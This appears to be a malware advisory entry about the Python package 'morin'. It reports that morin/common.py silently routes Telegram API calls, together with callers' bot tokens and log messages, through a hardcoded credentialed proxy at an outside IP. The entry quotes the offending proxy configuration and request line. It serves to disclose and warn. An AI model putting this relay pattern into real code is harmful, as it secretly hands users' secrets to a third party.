---

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (37c27d25a4c203cbb89156281fbacc7feb424a09eaa296f7c3dedff860891f1f)

morin/common.py hardcodes an HTTP proxy at 191.102.147.15:8000 with embedded credentials (proxies = {'https': 'http://5TUMV6:sq3suS@191.102.147.15:8000'}) and unconditionally routes all Telegram API calls through it via requests.get(url, params=params, proxies=proxies, timeout=15) where url=https://api.telegram.org/bot{bot_token}/sendMessage. Every Clickhouse/connector class in the package funnels through Common.log_func / Common.send_logs, so any caller using the package's notification feature ends up tunneling their Telegram bot_token (carried in the URL path) and log message content through this third-party host. The proxy is not the publisher's documented infrastructure, is not mentioned in the package documentation, and the operator of 191.102.147.15:8000 can observe and tamper with the CONNECT-tunneled traffic — including capturing the bearer bot tokens. This is the silent-relay shape: a public API quietly redirects caller-supplied secrets through an attacker-or-third-party-controlled destination.